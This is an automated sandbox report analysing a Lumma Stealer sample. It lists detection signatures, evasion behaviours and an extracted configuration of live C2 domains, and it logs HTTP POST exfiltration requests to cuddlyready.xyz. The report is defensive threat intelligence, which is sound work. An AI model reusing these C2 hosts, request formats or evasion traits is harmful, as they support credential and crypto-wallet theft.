Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QQ5BxgG5G6.exe

Overview

General Information

Sample name:QQ5BxgG5G6.exe
renamed because original name is a hash value
Original sample name:4a7846259e3d582b57bd30c67322c357.exe
Analysis ID:1579757
MD5:4a7846259e3d582b57bd30c67322c357
SHA1:3e54a3d27a36c4a24b7f642da39c0477d23d1848
SHA256:11774b91cf5fc5c4ad30a79ea9a2159271de17c68b2ac7149b15fb23d9828587
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Performs DNS queries to domains with low reputation
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • QQ5BxgG5G6.exe (PID: 7792 cmdline: "C:\Users\user\Desktop\QQ5BxgG5G6.exe" MD5: 4A7846259E3D582B57BD30C67322C357)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["sendypaster.xyz", "smash-boiling.cyou", "steppriflej.xyz", "supporse-comment.cyou", "pollution-raker.cyou", "hosue-billowy.cyou", "ripe-blade.cyou", "cuddlyready.xyz", "greywe-snotty.cyou"], "Build id": "PsFKDg--pablo"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      Process Memory Space: QQ5BxgG5G6.exe PID: 7792JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: QQ5BxgG5G6.exe PID: 7792JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: QQ5BxgG5G6.exe PID: 7792JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-23T08:38:50.538800+010020283713Unknown Traffic192.168.2.849705104.21.32.96443TCP
              2024-12-23T08:38:52.513407+010020283713Unknown Traffic192.168.2.849706104.21.32.96443TCP
              2024-12-23T08:38:55.423450+010020283713Unknown Traffic192.168.2.849707104.21.32.96443TCP
              2024-12-23T08:38:57.659276+010020283713Unknown Traffic192.168.2.849708104.21.32.96443TCP
              2024-12-23T08:38:59.961477+010020283713Unknown Traffic192.168.2.849709104.21.32.96443TCP
              2024-12-23T08:39:02.515687+010020283713Unknown Traffic192.168.2.849710104.21.32.96443TCP
              2024-12-23T08:39:05.146490+010020283713Unknown Traffic192.168.2.849712104.21.32.96443TCP
              2024-12-23T08:39:08.780984+010020283713Unknown Traffic192.168.2.849715104.21.32.96443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-23T08:38:51.286446+010020546531A Network Trojan was detected192.168.2.849705104.21.32.96443TCP
              2024-12-23T08:38:53.600013+010020546531A Network Trojan was detected192.168.2.849706104.21.32.96443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-23T08:38:51.286446+010020498361A Network Trojan was detected192.168.2.849705104.21.32.96443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-23T08:38:53.600013+010020498121A Network Trojan was detected192.168.2.849706104.21.32.96443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-23T08:38:56.325027+010020480941Malware Command and Control Activity Detected192.168.2.849707104.21.32.96443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: QQ5BxgG5G6.exeAvira: detected
              Source: QQ5BxgG5G6.exe.7792.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["sendypaster.xyz", "smash-boiling.cyou", "steppriflej.xyz", "supporse-comment.cyou", "pollution-raker.cyou", "hosue-billowy.cyou", "ripe-blade.cyou", "cuddlyready.xyz", "greywe-snotty.cyou"], "Build id": "PsFKDg--pablo"}
              Source: QQ5BxgG5G6.exeVirustotal: Detection: 56%Perma Link
              Source: QQ5BxgG5G6.exeReversingLabs: Detection: 60%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: QQ5BxgG5G6.exeJoe Sandbox ML: detected
              Source: 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmpString decryptor: pollution-raker.cyou
              Source: 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmpString decryptor: hosue-billowy.cyou
              Source: 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmpString decryptor: ripe-blade.cyou
              Source: 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmpString decryptor: smash-boiling.cyou
              Source: 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmpString decryptor: supporse-comment.cyou
              Source: 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmpString decryptor: greywe-snotty.cyou
              Source: 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmpString decryptor: steppriflej.xyz
              Source: 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmpString decryptor: sendypaster.xyz
              Source: 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmpString decryptor: cuddlyready.xyz
              Source: 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmpString decryptor: PsFKDg--pablo
              Source: QQ5BxgG5G6.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.8:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.8:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.8:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.8:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.8:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.8:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.8:49712 version: TLS 1.2
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeDirectory queried: number of queries: 1001

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49705 -> 104.21.32.96:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49705 -> 104.21.32.96:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49706 -> 104.21.32.96:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49706 -> 104.21.32.96:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49707 -> 104.21.32.96:443
              Source: Malware configuration extractorURLs: sendypaster.xyz
              Source: Malware configuration extractorURLs: smash-boiling.cyou
              Source: Malware configuration extractorURLs: steppriflej.xyz
              Source: Malware configuration extractorURLs: supporse-comment.cyou
              Source: Malware configuration extractorURLs: pollution-raker.cyou
              Source: Malware configuration extractorURLs: hosue-billowy.cyou
              Source: Malware configuration extractorURLs: ripe-blade.cyou
              Source: Malware configuration extractorURLs: cuddlyready.xyz
              Source: Malware configuration extractorURLs: greywe-snotty.cyou
              Source: DNS query: cuddlyready.xyz
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 104.21.32.96:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49710 -> 104.21.32.96:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49708 -> 104.21.32.96:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49705 -> 104.21.32.96:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 104.21.32.96:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49712 -> 104.21.32.96:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49709 -> 104.21.32.96:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49715 -> 104.21.32.96:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cuddlyready.xyz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: cuddlyready.xyz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6M4MVPLOGKI530K8YLDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12852Host: cuddlyready.xyz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XWG7F67A48QVQTANXOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15075Host: cuddlyready.xyz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SZOO0P7591CXSVW1XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20236Host: cuddlyready.xyz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=B15U8NRI2RHKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1200Host: cuddlyready.xyz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TLUL9N00R954C6UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 552337Host: cuddlyready.xyz
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: cuddlyready.xyz
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cuddlyready.xyz
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1531588114.0000000005D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1531588114.0000000005D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1580254004.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1557425029.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1633788926.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1483903137.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1579432168.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1634153690.00000000015FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1531588114.0000000005D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1531588114.0000000005D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1531588114.0000000005D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1531588114.0000000005D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1531588114.0000000005D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1531588114.0000000005D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1531588114.0000000005D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1531588114.0000000005D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1531588114.0000000005D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1533324823.0000000005CDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1533324823.0000000005CDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1533324823.0000000005CDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1533324823.0000000005CDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1579286191.0000000005CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509661602.0000000005CCB000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1509917557.0000000005CCB000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1509507807.0000000005CC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz//
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1579286191.0000000005CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/Z
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1580143357.0000000001635000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1579237767.0000000001635000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/a8
              Source: QQ5BxgG5G6.exe, QQ5BxgG5G6.exe, 00000000.00000002.1635634925.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1579237767.0000000001621000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1633788926.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1634334937.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1483903137.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1557463856.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1633788926.0000000001589000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1579492722.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000002.1635508382.0000000001589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/api
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1530950088.0000000005CDE000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1530842219.0000000005CD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/api/
              Source: QQ5BxgG5G6.exe, 00000000.00000002.1635634925.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1633788926.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1634334937.00000000015CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/apis
              Source: QQ5BxgG5G6.exe, 00000000.00000002.1635838883.0000000001635000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1597421580.0000000001635000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1634399768.0000000001634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/h
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1483903137.00000000015CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/pi
              Source: QQ5BxgG5G6.exe, 00000000.00000002.1635838883.0000000001635000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1597421580.0000000001635000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1634399768.0000000001634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/pi0
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1633788926.0000000001593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz:443/api
              Source: QQ5BxgG5G6.exe, 00000000.00000002.1635508382.0000000001593000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1633788926.0000000001593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz:443/apil
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1533324823.0000000005CDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1532791350.0000000005F7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1532791350.0000000005F7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1533324823.0000000005CDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1533324823.0000000005CDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1532675848.0000000005D5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1532791350.0000000005F7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1532791350.0000000005F7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1532791350.0000000005F7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1532791350.0000000005F7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
